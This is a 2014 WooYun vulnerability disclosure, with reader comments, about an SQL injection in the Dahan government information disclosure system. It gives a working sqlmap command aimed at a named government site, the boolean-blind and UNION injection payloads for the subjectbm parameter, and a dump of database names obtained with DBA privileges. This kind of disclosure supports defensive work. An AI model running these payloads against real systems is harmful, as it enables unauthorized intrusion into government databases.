大汉版通政府信息公开系统SQL注射 | wooyun-2014-061381| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061381

漏洞标题：大汉版通政府信息公开系统SQL注射

漏洞作者：路人甲

提交时间：2014-05-19 19:48

修复时间：2014-08-17 19:50

公开时间：2014-08-17 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-19：细节已通知厂商并且等待厂商处理中
2014-05-20：厂商已经确认，细节仅向厂商公开
2014-05-23：细节向第三方安全合作伙伴开放
2014-07-14：细节向核心白帽子及相关领域专家公开
2014-07-24：细节向普通白帽子公开
2014-08-03：细节向实习白帽子公开
2014-08-17：细节向公众公开

简要描述：

政府信息公开系统

详细说明：

政府信息公开系统某处sql注射漏洞
注入点
zfxxgk/subjectinfo.jsp?subjectbm=
subjectbm参数过滤不严，导致注入
政府网站案例

sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/subjectinfo.jsp?subjectbm=" --is-dba --dbs

payload

Place: GET
Parameter: subjectbm
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: subjectbm=%' AND 7860=7860 AND '%'='
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: subjectbm=-9666%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,CHAR(113)+CHAR(104)+CHAR(112)+CHAR(116)+CHAR(113)+CHAR(81)+CHAR(120)+CHA
R(113)+CHAR(102)+CHAR(97)+CHAR(66)+CHAR(101)+CHAR(81)+CHAR(69)+CHAR(68)+CHAR(113
)+CHAR(98)+CHAR(100)+CHAR(119)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
current user is DBA:    True

管理员权限注射
列一下数据库

[*] gov
[*] jcms
[*] jcmsvc
[*] jis
[*] lm
[*] mailbook
[*] master
[*] model
[*] msdb
[*] newlm
[*] Northwind
[*] pubs
[*] sms
[*] tempdb
[*] vipchat
[*] xxgk

漏洞证明：

证明截图

修复方案：

过滤相关参数

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-05-20 09:40

厂商回复：

感谢关注

漏洞评价：

2014-05-19 20:40 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

最近刷爆了
2014-05-20 09:57 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

mk，大汉最近分数有点高啊
2014-05-20 10:31 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@zzR 不知道什么情况
2014-05-20 10:58 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

@wefgod 估计换了个选手来管理乌云这块了
2014-05-20 11:29 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术，而是人类善良的心灵...)

Rank提高个人觉得主要还是wefgod的功劳，礼物被吐槽之后，想到rank不是自己花钱，所以就大方了。另外源码流出来，就和女人被脱光一样，被人看过之后，也就放开了，一开始可能难以接受，但是用脑子想一想，白帽还不是为他们产品好，他们产品的安全性成几个数量级的提升，如果rank能给100，他们也会给100的。感觉近期这么火，会不会是在60的选手来捧场？以上纯属个人意淫，请勿当真。
2014-06-09 10:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@刺刺哈哈
2014-08-17 22:31 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM：http://bbs.jyhack.com/)

我擦、、最近大汉网络的人肯定不爽、、人家都忙不过来了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061381

漏洞标题：大汉版通政府信息公开系统SQL注射

相关厂商：南京大汉网络有限公司

漏洞作者：路人甲

提交时间：2014-05-19 19:48

修复时间：2014-08-17 19:50

公开时间：2014-08-17 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061381

漏洞标题：大汉版通政府信息公开系统SQL注射

相关厂商：南京大汉网络有限公司

漏洞作者： 路人甲

提交时间：2014-05-19 19:48

修复时间：2014-08-17 19:50

公开时间：2014-08-17 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-061381"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云